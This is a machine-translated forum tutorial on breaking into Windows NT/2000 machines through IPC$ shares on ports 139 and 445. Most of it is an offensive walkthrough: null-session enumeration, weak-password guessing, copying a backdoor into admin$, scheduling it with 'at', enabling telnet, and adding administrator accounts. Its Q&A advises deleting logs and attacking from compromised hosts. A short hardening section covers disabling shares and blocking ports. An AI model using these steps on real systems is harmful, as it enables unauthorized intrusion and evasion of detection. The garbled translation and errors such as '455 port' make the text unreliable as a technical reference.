445port Intrusion Specific explanation

445port Intrusion Specific explanation
About the "445port intrusion" content
445port Intrusion Specific explanation
This site searches for many other content about "445port intrusion"

445port intrusion, before this is the first thing we want to see or 445port why back to become the port of the invasion?
445port is the default port for the IPC service
ipc$
A summary
Two what is ipc$
Three what is a null session
What can four empty sessions do
The port used by the five ipc$
The significance of six IPC pipelines in hack attack
Seven ipc$ common causes of connection failures
Eight reasons why a copy file failed
Ix. limitations on the AT command and XP for ipc$
How to open the target ipc$ share and other shares
Some orders that require the shell to finish.
12 commands that may be used in an intrusion
13 control of past and present ipc$ invasions
14 How to prevent ipc$ invasion
Ipc$ Invasion Quiz Selection
16 at the end.
A summary
Online about the ipc$ invasion of the article is a lot of, attack steps have even become a curing mode, so no one is willing to put this has become the formula of things to play with. Just say that, I think these articles are not specific explanations, some of the content is even wrong, so that the question of ipc$ almost accounted for the majority of the Security forum discussion area of half, and these problems are often repeated, seriously affect the quality of the forum and learning efficiency, so I summed up this article, I hope to Ipc$ This part of the thing as far as possible to say clearly.
Note: The various scenarios discussed in this article are defaulted to the win nt/2000 environment, and Win98 will not be included in this discussion.
Two what is ipc$
ipc$ (Internet Process Connection) is a resource that shares a named pipe, which is a named pipe that is open for interprocess communication, by providing a trusted username and password that connects two parties to establish a secure channel for exchanging encrypted data with this channel To enable access to remote computers. Ipc$ is a new feature of nt/2000, which has one feature, that is, at the same time, two IP only agree to establish a connection. nt/2000 at the same time that the ipc$ feature was provided, the default share was also turned on when the system was first installed, that is, all of the logical shares (c$,d$,e$ ...) and the system catalog Winnt or Windows (admin$) share. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, resulting in a reduction in system security.
Usually we can always hear someone say ipc$ loopholes, ipc$ loopholes, in fact ipc$ is not a real sense of the loophole, I think the reason someone said that, must be referring to Microsoft's own placement of the ' backdoor ': null session (NULL). So what is a null session?
Three what is a null session
Before we introduce a null session, it's important to understand how a secure session is built.
In Windows NT 4.0, which uses the Challenge response protocol to establish a session with a remote machine, establishing a successful session will become a secure tunnel, establishing two parties to communicate information through it, the approximate order of the process such as the following:
1) The session requestor (client) transmits a packet to the session recipient (server), requesting the establishment of a secure tunnel;
2) The server generates a random 64-digit number (Implementation challenge) to transfer back to the customer;
3) The client obtains this 64-digit number generated by the server, disrupts it with the password of the account attempting to establish the session, and returns the result to the server (implementing the response);
4) When the server accepts a response and sends it to the local Security authentication (LSA), the LSA verifies the requestor's identity by using the correct password for the user to verify the response. Assuming that the requestor's account is the local account of the server, verify that it occurs locally, and that the requested account is a domain account, and the response is routed to the domain controller to verify. When the response to the challenge is verified as correct, an access token is generated and then delivered to the customer. The client uses this access token to connect to resources on the server until the proposed session is terminated.
The above is the general process of establishing a secure session, so what about a null session?
A null session is a session established with the server without trust (that is, username and password are not provided), but according to the WIN2000 access control model, the establishment of a null session is required to provide a token, but the null session is not authenticated by the user information during the establishment process. Therefore, this token does not include user information, so this session does not allow the system to send encrypted information, but this does not mean that the null session of the token does not include the security identifier SID (which identifies the user and the owning group), for a null session, the SID of the token provided by the LSA is s-1-5-7, which is the null session SID, username is: ANONYMOUS LOGON (this username can be seen in the list of users, but not found in the SAM database, belongs to the system's built-in account), this access token includes the following masquerading groups:
Everyone
Network
Under Security policy restrictions, this null session will be authorized to access all the information that the two groups above have permission to ask. So what can you do to establish a null session?
What can four empty sessions do
For NT, under the default security settings, the use of NULL connection can enumerate the target host users and shares, access to the sharing of the permissions of everyone, visit a small number of register table, etc., and there is no great value for the use of 2000, due to the role of Windows In the 2000 and later version numbers, only Administrators and Backup Operators have the right to access the registration form from the network, and it is not convenient to implement them, and tools are required.
From these we can see that such a non-trust session is not much use, but from a full ipc$ invasion, null session is an essential springboard, because we can get a list of users from it, and most of the weak password scanning tool is to use this user list for password guessing, The successful export user list adds the success rate of the guess, which is enough to explain the security implications of the null session, so it is wrong to say that null sessions are useless. Here are some specific commands that you can use in a null session:
1 First, let's set up a null session (which, of course, requires a target open ipc$)
Command: NET use \\ip\ipc$ ""/user: ""
Note: The above command includes four spaces, net and use in the middle there is a space, use the following one, password a space around each.
2 Viewing shared resources for a remote host
Command: NET view \\ip
Explanation: If an empty connection is established, this command can be used to view the shared resources of the remote host, assuming it is shared and able to obtain results such as the following, but this command cannot display the default share.
Shared Resources in \\*.*.*.*
Resource Share name Type purpose gaze
-----------------------------------------------------------
NETLOGON Disk Logon Server share
SYSVOL Disk Logon Server share
Command completed successfully.
3 Viewing the current time of a remote host
Command: NET time \\ip
Explanation: Use this command to get the current time of a remote host.
4 Get the NetBIOS username list of the remote host (need to open your own NBT)
Command: NBTSTAT-A IP
Use this command to get a list of NetBIOS username for a remote host that returns such as the following results:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
Oyamanishi-h <00> GROUP Registered
Oyamanishi-h < 1C > GROUP registered
SERVER <20> UNIQUE Registered
Oyamanishi-h <1B> UNIQUE Registered
Oyamanishi-h <1E> GROUP Registered
SERVER <03> UNIQUE Registered
Oyamanishi-h <1D> UNIQUE Registered
.. __msbrowse__.<01> GROUP Registered
Inet~services < 1C > GROUP registered
is~server......<00> UNIQUE Registered
MAC Address = 00-50-8b-9a-2d-37
The above is what we often do with empty sessions, as if we can get a lot of things yo, just to note that the operation to establish a ipc$ connection will leave a record in the Event log, regardless of whether you log in successfully. OK, so let's take a look at the port that Ipc$ uses.
The port used by the five ipc$
First, let's look at some basic knowledge:
1 smbserver Message Block) Windows protocol family for file print sharing services;
2 Nbtnetbios over TCP/IP) uses 137 (UDP) 138 (UDP) 139 (TCP) port to implement a NETBIOS network interconnect based on the TCP/IP protocol.
3 in WindowsNT SMB is based on NBT implementation, that is, using 139 (TCP) port, whereas in Windows2000, SMB is implemented directly through the 445 port in addition to NBT-based implementations.
With this basic knowledge, we can further discuss the choice of the network share to port:
For Win2000 Client (initiator):
1 assuming that when the server is connected with NBT consent, the client will try to access 139 and 445 port at the same time, assuming that 445 port has a response, then send the RST packet to 139 port to disconnect, with 455 port for the session, when 445 port When unresponsive, use 139 port, assuming that two ports are not responding, the session fails;
2 If the server is connected without NBT, then the client will simply attempt to access 445 port, assuming that 445 port is unresponsive, then the session fails.
For the Win2000 server side:
1 assuming consent NBT, then UDP Port 137, 138, TCP port 139, 445 will be open (LISTENING);
2 If NBT is forbidden, then only 445 port is open.
The ipc$ session we established is the same as the choice of port to follow the above principles. It is obvious that if the remote server is not listening on 139 or 445 port, the ipc$ session cannot be established.
The significance of six IPC pipelines in hack attack
The IPC pipeline was originally designed to make it easier for administrators to manage remotely, but in the eyes of intruders, the hosts that open the IPC pipeline seem to be more accessible. Through the IPC pipeline, we are able to remotely invoke some of the system functions (mostly through the tools, but need the corresponding permissions), which is often the key to the success of the invasion. Assuming that these are not taken into account, the IPC pipeline has already given the intruder a lot of support, and has even become the most important means of transmission, so you can always see some friends in various forums who are helpless to help themselves because they can't open the IPC pipe of the target machine. Of course, we can not ignore the authority in the IPC pipeline play an important role, presumably you must taste the embarrassment of empty session, no authority, open the pipeline we also helpless. But once the intruder gets the authority of the Administrator, the two-edged sword of the IPC pipeline will show its hideous side.
Seven ipc$ common causes of connection failures
The following are some common causes of ipc$ connection failures:
1 IPC connection is a feature unique to Windows NT and above, because it needs to use very many DLL functions in Windows NT, so it can't be executed in Windows 9.x/me system, that is to say, only nt/2000/xp can build each other ipc$ Connection, 98/me is unable to establish ipc$ connection;
2 false assumption the successful establishment of a ipc$ connection, it is necessary for the responder to turn on the ipc$ share, even if it is an empty connection, assuming that the responder closed the ipc$ share, will not establish a connection;
3 The connection initiator did not start the LanmanWorkstation service (display named: Workstation): It provides network links and communication, no initiator can not initiate connection request;
4 The responder does not start the LanManServer service (display named: Server): It provides RPC support, file, print, and named pipe shares, Ipc$ relies on this service, no host will be unable to respond to the initiator's connection request, except that it can still initiate a ipc$ connection;
5 The responder does not start the NetLogon, which supports the computer pass-through account login status on the network (this is just not the case);
6 The 139 of the responder, 445 port is not in the listening state or blocked by the firewall;
7 Connection Initiator does not open 139, 445 port;
8 Username or password error: Assuming such an error occurs, the system will give you an error message similar to ' Cannot update password ' (apparently null session excludes such errors);
9 Command input Error: May be more or less space, when the username and password are not included in the space between the two arguments can be omitted, assuming that the password is empty, can directly input two "" can be;
10 Assuming that the connection has been established in the case of the other side to restart the computer, then the ipc$ connection will be the active disconnection, need to establish a connection again.
In addition, you can analyze the cause based on the error number returned:
Error number 5, denial of access: it is very likely that the user you are using is not an administrator;
Error number, Windows cannot find the network path: There is a problem with the network;
Error number 53, network path not found: IP address error, target not powered on, target LanManServer service not started, Target has firewall (port filter);
Error number 67, the network name could not be found: your LanmanWorkstation service was not started or the target was deleted ipc$;
Error number 1219, the supplied credential conflicts with an existing set of credentials: you have established a ipc$ with each other, please remove the re-connected;
Error number 1326, unknown username or error password: The cause is very obvious;
Error number 1792, attempting to log on, but the network logon service does not start: The target NetLogon service is not started;
Error number 2242, the user's password has expired: The target has an account policy, forcing periodic requests to change the password.
Eight reasons why a copy file failed
Some friends in spite of the successful establishment of the ipc$ connection, but in the copy, but encountered such trouble, unable to replicate the success, then the common cause of replication failure is what?
1 The other party does not open the shared directory
This type of error occurs most, accounting for more than 50%. Many friends in the ipc$ connection after the establishment of a successful, even do not know whether the other side has a shared directory, the blind copy, resulting in replication failure and depressed very much. So I suggest you make sure to use NetView \\IP this command before copying to see if the shared directory you want to replicate exists (and, of course, better with software), do not feel that you can establish a ipc$ connection there must be a shared directory exists.
2 failed to share replication to default
This kind of mistake is also commonly committed by everyone, there are two main aspects:
1) The wrong feel can establish the ipc$ connection of the host must be turned on the default share, so after the connection is established immediately to the default shared copy files such as c$,d$,admin$, once the other party does not open the default share, will cause replication failure. ipc$ connection success only means that the other party opened the ipc$ share, does not indicate that the default share must exist. Ipc$ sharing is not the same as the default share, ipc$ sharing is a named pipe, not the actual directory, and the default share is a real shared directory;
2) because the net View \\IP command cannot display the default shared directory (due to the default share with $), with this command, we cannot infer whether the other party has the default share turned on, so assuming that the other party does not turn on the default share, all actions to the default share will not succeed (only most scanning software can sweep to the default shared directory at the same time as the weak password, to avoid such errors)
Key points: Please be sure to distinguish between IPC sharing, default sharing, common sharing the difference: IPC Sharing is a pipeline, not an actual shared directory; The default share is the directory that is opened by default at the time of installation, and common sharing is the shared directory on which we can set permissions.
3 Insufficient user rights, including four scenarios:
1) When a null connection is copied to all shares (default share and normal share), the permissions are not sufficient;
2) When replicating to the default share, in the Win2000 Pro Edition, only the Administrators and Backup Operators group members are sufficient, and the WIN2000 server version number Server Operatros group can also access these Enjoy the catalogue;
3) to the ordinary share replication, to have the corresponding permissions (that is, the other administrator has set the access rights);
4) The other side can be through the firewall or security software settings, prohibit external access to share;
Attention:
1 do not feel that administrator must have administrator rights, the administrator name can be changed
2 administrators can access the default shared directory, but not necessarily to access the common shared directory, because the administrator can access the normal shared directory permission settings, 6, the administrator set the access to the D drive for the only users who agree to the directory named Xinxin, At this point, even if you have administrator privileges, you still can't access the D drive. It is only interesting to assume that at this time the other party has opened the d$ default share, then you can access to ask d$, thus bypassing the restrictions, interested friends can do their own test.
4 killed by firewall or on LAN
Another situation, that is, perhaps your copy operation has been successful, but when the remote execution, was killed by the firewall, resulting in the file cannot be found, or you copy the Trojan horse to the local area network host, resulting in a connection failure (the reverse connection of the Trojan will not happen this situation). Suppose you didn't think of such a situation, you would think it was a duplication problem, but actually your copy operation has been successful, just the execution of the problem.
Hehe, we also know that ipc$ connection in the actual operation of the process will appear a variety of problems, above I summed up is just a few common mistakes, did not say, we can give me a wake up.
Ix. limitations on the AT command and XP for ipc$
I would also like to say the reason for using at remote execution program, but considering the success rate of at is not very high, the problem is also very much, here do not mention it (the more, the more people use), but recommend that you use Psexec.exe remote execution program, assume that you want the remote machine to execute local C: \ Xinxin.exe file, and the administrator is administrator, password is 1234, enter the following command:
PsExec \\ip-u administrator-p 1234-c C:\xinxin.exe
Assuming that an IPC connection has been established, the-u-p of these two parameters does not require that Psexec.exe will voluntarily copy the file to the remote machine and execute it.
Originally XP ipc$ also do not want to discuss here, want to come out alone to discuss, but see more and more friends are very eager to ask why encountered XP, most of the operations are very difficult to succeed. I'll simply mention it here, in the default security options for XP, no matter what the remote access is given only to guest permissions, that is, even if you are using the Administrator account and password, you get the permissions are only guest, so most operations will fail due to insufficient permissions, And so far there is no good way to break this limit. So assuming you really got XP admin password, I suggest you try to avoid the IPC pipeline.
How to open the target ipc$ share and other shares
The goal of the ipc$ is not easy to open, otherwise the world will be disrupted. You need a shell with admin privileges, such as Telnet, trojan, cmd redirect, etc., and then execute it under the shell:
NET share ipc$
ipc$ sharing of open targets;
NET share ipc$/del
Close the target's ipc$ share; If you want to open a shared directory for it, you can use:
NET share Xinxin=c:\
This opens its C drive as a shared directory named Xinxin. (but I found that a lot of people mistakenly feel that the command to open a shared directory is net share C $, but also swept to the rookie point, really fraught). Again, these operations are accomplished under the shell.
Some orders that require the shell to finish.
See a lot of tutorials this aspect of writing is very inaccurate, some need shell talent finished command simple in the ipc$ connected under the implementation of, played a misleading role. So here's a summary of the commands I need to finish at the shell:
1 set up a user to the remote host, activate the user, change the user password, join the management Group operations need to complete under the shell;
2 Open the remote host's ipc$ share, the default share, common sharing operation needs to complete under the shell;
3 Execution/shutdown of the remote host service, need to complete under the shell;
4 Start/Kill the remote host process, also need to complete under the shell (with the exception of software, such as PsKill).
12 commands that may be used in an intrusion
For the completeness of this tutorial, I have listed some of the frequently used commands in the ipc$ intrusion, assuming you have mastered these commands, you can skip this section to see the following. Note that these commands are for local or remote, assuming that only the local, you can only get the remote host shell (such as CMD, Telnet, etc.), the ability to execute to the remote host.
1 Create/delete ipc$ connection commands
1) Establish an empty connection:
NET use \\127.0.0.1\ipc$ ""/user: ""
2) Establish a non-null connection:
NET use \\127.0.0.1\ipc$ "password"/user: "username"
3) Delete the connection:
NET use \\127.0.0.1\ipc$/del
2 operating commands for remote hosts in a ipc$ connection
1) View the shared resources of the remote host (the default share is not visible):
NET view \\127.0.0.1
2) View the current time of the remote host:
NET time \\127.0.0.1
3) Get the NetBIOS username list of the remote host:
Nbtstat-a 127.0.0.1
4) Map/delete remote share:
NET use Z: \\127.0.0.1\c
This command maps a shared resource named C to a local Z-disk
NET use Z:/del
Delete mapped Z-disk, other disk analogy
5) Copy files to the remote host:
Copy path \ file name \\IP\ shared directory name, such as:
Copy C:\xinxin.exe \\127.0.0.1\c$ is about to copy the Xinxin.exe under C drive to the other side C drive
Of course, you can also copy files from a remote host to your own machine:
Copy \\127.0.0.1\c$\xinxin.exe c \
6) Remote Join the scheduled task:
At \\IP time program name such as:
At \\127.0.0.0 11:00am Xinxin.exe
Note: Try to use the 24-hour system as much as possible; Assume that the program you plan to execute does not add paths under the system default search path (for example, system32/), otherwise the full path must be added
3 Local Commands
1) View the shared resources of the local host (you can see the local default share)
NET share
2) Get a list of local host users
NET user
3) Display account information for a local user
NET User account name
4) Displays the service currently started by the local host
net start
5) Start/close Local Service
Net START service Name
NET stop service Name
6) Join the account locally
NET user account name Password/add
7) activating the disabled user
NET UESR account name/active:yes
8) Join the Admins group
net localgroup Administrators account name/add
Obviously, although these are local commands, suppose you enter them in the remote host's shell, for example, if you enter these commands after Telnet succeeds, these local inputs will be on the remote host.
4 some other commands
1) Telnet
Telnet IP Port
Telnet 127.0.0.0 23
2) Use Opentelnet.exe to turn on remote host Telnet
OpenTelnet.exe \\IP Administrator account password NTLM authentication method port
OpenTelnet.exe \\127.0.0.1 Administrator "" 1 90
Just this gadget needs to meet four requirements:
1) The target is open ipc$ sharing
2) You need to have admin password and account number
3) The target opens the RemoteRegistry service, the user can change the NTLM authentication
4) Valid for WIN2K/XP only
3) Use Psexec.exe one step to get shell, need IPC pipeline support
Psexec.exe \\IP-u Administrator Account-p password cmd
Psexec.exe \\127.0.0.1-u administrator-p "" cmd
13 control of past and present ipc$ invasions
Since it is the control, then I first to the past ipc$ invasion steps to everyone, are pretty classic steps:
[1]
C:\>net use \\127.0.0.1\ipc$ ""/user:admintitrators
\ \ Use a swept null password to establish a connection
[2]
C:\>net View \\127.0.0.1
\ \ View a remote shared resource
[3]
C:\>copy Srv.exe \\127.0.0.1\admin$\system32
\ \ Copy the one-time backdoor srv.exe to the other's system directory, if admin$ is turned on
[4]
C:\>net Time \\127.0.0.1
\ \ View the current time of the remote host
[5]
C:\>at \\127.0.0.1 Time Srv.exe
\ \ Use the AT command to execute Srv.exe remotely, requiring the other party to open the ' Task Scheduler ' service
[6]
C:\>net Time \\127.0.0.1
\ \ Check the current time again to estimate if Srv.exe has been executed, this step can omit
[7]
C:\>telnet 127.0.0.1 99
\ \ Open a new form and remotely log in to 127.0.0.1 with telnet to get a shell (what does the shell mean?) Then you think of it as the remote control of the machine, operation like DOS, the Srv.exe port is the one-time back door open port
[8]
C:\winnt\system32>net start Telnet
\ \ We started the remote machine Telnet service in the shell just landed, after all, Srv.exe is a one-time backdoor, we need a long back door for later access, assuming the other party's telnet has been started, this step can be omitted
[9]
C:\>copy Ntlm.exe \\127.0.0.1\admin$\system32
\ \ In the original form will pass Ntlm.exe, Ntlm.exe is used to change the Telnet authentication
[10]
C:\winnt\system32>ntlm.exe
\ \ Executes the ntlm.exe in the shell form, and you will be able to telnet to the host in the future.
[11]
C:\>telnet 127.0.0.1 23
\ \ In the new form telnet to 127.0.0.1, port 23 can be omitted, so we get a long back door
[12]
C:\winnt\system32>net User account name Password/add
C:\winnt\system32>net UESR Guest/active:yes
c:\winnt\system32>net localgroup Administrators account name/add
After \\telnet, you can create a new account, activate Guest, add any account to the admin group, etc.
All right, here I am. I seem to be back in 2, 3 years ago, when the ipc$ were so used, but with the advent of new tools, some of the tools and commands mentioned above are now less frequently used, so let's take a look at today's efficient and simple ipc$ invasion.
[1]
Psexec.exe \\IP-u Administrator Account-p password cmd
\ \ With this tool we can one step get the shell
OpenTelnet.exe \\server Administrator account password NTLM authentication method port
\ \ Use it to easily change the way Telnet authentication and port, convenient for us to login
[2]
There is no second step, with a step to get the shell, you can do anything, Ann Backdoor can use WinShell, cloning on the use of CA bar, open terminal with 3389.VBE, record password with Win2kpass, in short, a lot of good tools, as you choose, I will not say more.
14 How to prevent ipc$ invasion
1 suppress NULL connections for enumeration (this operation does not prevent the establishment of an empty connection)
To execute regedit, find for example the following primary key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] Change the key value of RestrictAnonymous = DWORD to: 1
Assuming that the setting is "1", an anonymous user can still connect to the ipc$ share, but cannot get the permissions to enumerate the SAM account and share information through such a connection, and "2" is added in Windows2000, and users who do not have anonymous rights will not be able to ipc$ empty connections. The recommended setting is 1. If the above mentioned primary key does not exist, create a new one and then change the key value. Suppose you find it troublesome to change the registration form to be able to set this entry in local Security settings: Local Security Settings-Local Policies-security options-' additional restrictions on anonymous connections '
2 Prohibit default sharing
1) View local shared resources
Execute-cmd-Input net share
2) Delete Share (default share still exists after restart)
NET share ipc$/delete
NET share admin$/delete
NET share C $/delete
NET share d$/delete (assuming there is e,f, ... can continue to delete)
3) Stop the Server service
net stop server/y (once again the server service is turned on again)
4) Prevent yourself from actively opening the default share (this action does not turn off ipc$ sharing)
Executive-regedit
Server Edition: Find such as the following primary key [Hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters] put AutoShareServer (DWORD), change the key value to: 00000000.
Pro version: Find such as the following primary key [Hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters] put AutoShareWks (DWORD ), change the key value to: 00000000.
These two key values are not present on the host by default, they need to be added manually, the machine is changed and the setting takes effect.
3 Turn off ipc$ and default share dependent services: Server service
If you really want to turn off ipc$ sharing, then disable the Server service:
Control Panel-Administrative Tools-Services-Find Server service (right-click)-Properties-general-Startup type-optional disabled, you may be prompted to say: The XXX service will also shut down whether to continue, because there are some secondary services to rely on the server service, do not control it.
4 shielded 139, 445 port
Since there is no support for the above two ports, it is impossible to establish ipc$, so shielded 139, 445 port The same can prevent ipc$ intrusion.
1) 139 port can block by blocking NBT
Local Area Connection-tcp/it Properties-Advanced-WINS-select ' Disable NETBIOS on tcp/it '
2) 445 port can be blocked by altering the register
Add a key value
Hive:hkey_local_machine
Key:system\controlset\services\netbt\parameters
Name:smbdeviceenabled
Type:reg_dword
value:0
Restart the machine after the change is complete
Note: If you block out the above two ports, you will not be able to invade others with ipc$.
3) Install firewall for port filtering
6 Set up complex password, prevent through ipc$ poor cite password, I think this is the best way to enhance security awareness, more than the constant patching to be more secure.
Ipc$ Invasion Quiz Selection
The above said a lot of theoretical things, but in practice you will encounter a variety of problems, so in order to give everyone the greatest help, I have organized the major security Forum some representative questions and answers, some of which are I give, some of the reply on the forum, if there is any doubt, can come to me to discuss.
1. When the ipc$ intrusion is made, the records are left in the server, is there any way to keep the server from discovering it?
A: Leave a record is certain, you go after using clear log program Delete can, or with broiler invasion.
2. What you see below is why you can connect but not copy
NET use \\***.***.***.***\ipc$ "password"/user: "username"
Command succeeded
Copy Icmd.exe \\***.***.***.***\admin$
The network path could not be found
Command not successful
A: Like "can't find the Network path" "" Cannot find the network name "problem, mostly because you want to copy to the shared directory is not open, so there will be errors when copying, you can try to find other shared directory.
3. Assume that the other side opened the ipc$, and can establish an empty connection, but open C, D disk, are required to password, I know that there is no too much access to empty connections, but there is no other way?
A: It is recommended to use streamer or other scanning software to try to guess the password, assuming that you can not guess, just give up, after all, the ability of empty connection is limited.
4. I have guessed the administrator's password, and have ipc$ the connection succeeded, but net view \\ip found that it did not open the default share, what should I do?
A: First correct one of your errors, with the net view \\ip is unable to see the default share, you can try to copy the file to C $, d$ see, if not, it means that he closed the default share, then you use Opentelnet.exe or Psexec.exe bar, using the method above has 。
5.ipc$ the connection was successful, I set up an account with the following command, but found this account on my own machine, what's going on?
NET Uset Ccbirds/add
A: ipc$ success simply means that you have a communication tunnel with a remote host, and it doesn't mean you have a shell, just after you get a shell (such as Telnet), you can create an account on the remote machine, otherwise your operation is only done locally.
6. I have entered a meat machine, with the administrator account, can see his system time, but copy the program to his machine but not, each prompt "refused access to ask, has copied 0 files", is not the other party has what service did not open, what should I do?
A: Generally speaking "Deny access" is the result of insufficient permissions, it may be that you use the account has a problem, another possibility, if you want to copy files to a common shared directory but return this error, indicating that the directory settings of the consent of the user does not include you (even if you are an administrator), which I analyzed in the previous issue.
7. Can I use Win98 to establish ipc$ connection with each other?
A: Theoretically not, to carry out ipc$ operation, the proposed use of Win2000, with other operating systems will bring a lot of unnecessary trouble.
8. I used net use \\ip\ipc$ ""/user "" successfully established a null session, but with nbtstat-a IP but unable to export the user list, this is why?
A: A null session is able to export the list of users by default, but assuming that the administrator prevents the list from being exported by altering the register, the situation will appear, and your own NBT may not be open, and the netstat command is built on NBT.
9. When I establish a ipc$ connection, the following information is returned, for example: ' The supplied credential conflicts with an existing set of credentials ', what's going on?
A: Oh, this indicates that you have established a ipc$ connection with the target host, two hosts between the same time to establish two ipc$ connection is not agreed.
10. I appear in the map:
F:\>net Use H: \\211.161.134.*\e$
The system has a 85 error.
The local device name is already in use. What's going on?
A: You are too careless, it means that you have an H-disk, map to the letter of the No!
11. I set up a connection f:\>net use \\*.*.*.*\ipc$ "123"/user: "Guest" succeeded, but when I mapped an error occurred, to me to password, what's going on?
F:\>net Use H: \\*.*.*.*\c$
Password is invalid in \\*.*.*.*\c$.
Please type \\*.*.*.*\c$ password:
The system has a 5 error.
Refusal to access the interview.
A: Oh, to you to password that you are currently using the user rights are not enough, can not map C $ this default share, ways to improve permissions or find the administrator's weak password it! The default share usually requires administrator privileges.
12. I used Superscan to sweep to a host that opened the 139 port, but why can't I have a null connection?
A: You confuse the relationship between ipc$ and 139, can make ipc$ connection of the host must open 139 or 445 port, but open the two port host can not necessarily be able to connect, because the other side can turn off ipc$ sharing.
13. Our LAN machine is mostly XP, I use Streamer scan to several administrator account password is empty, and can connect, but can not copy things, say error 5. May I ask why?
A: The security of XP is higher, in the default setting of security policy, when authenticating the network logon of local account, I feel the guest privilege, even if you log in remotely with the administrator, only have guest permission, so you copy the file, of course, error 5: Insufficient permissions.
14. I used net use \\192.168.0.2\ipc$ "password"/user: "Administrator" succeeds, but NET uses I: \\192.168.0.2\c
appears please type \\192.168.0.2 password, how to return to the matter? I use it, but the administrator? Should have access to anything?
A: Although you have administrator rights, but the administrator set the C-Drive sharing permissions (note: Normal sharing can set access permissions, and the default share does not) may not set the consent to administrator visit, so this problem occurs.
15. If your machine prohibits ipc$, is it possible to use ipc$ to connect other machines? What if the server service is forbidden?
A: Prohibit the above two can still initiate the ipc$ connection, just such a problem of self-test will be better.
16. Can you tell me the reason for the following two errors?
C:\>net Time \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
C:\>net View \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
A: When I first encountered this problem, I was also very puzzled, error 5 means insufficient permissions, but the permissions of the null session can be completed above the two commands, why can't he? Did he not establish a connection? Then the careless comrade told me it was so, he forgot that he had deleted the ipc$ connection, and then he entered the above two commands, with the error 5 occurred.
17. You see what's going on here?
F:\>net time
The time server could not be found.
Please type NET helpmsg 3912 for a lot of other help.
A: The answer is very easy, your command is wrong, it should be net time \\ip
No IP address was entered and the server could not be found. The view command should also have an IP address, ie: NET view \\ip

Favorite Share Rating

445port Intrusion Specific explanation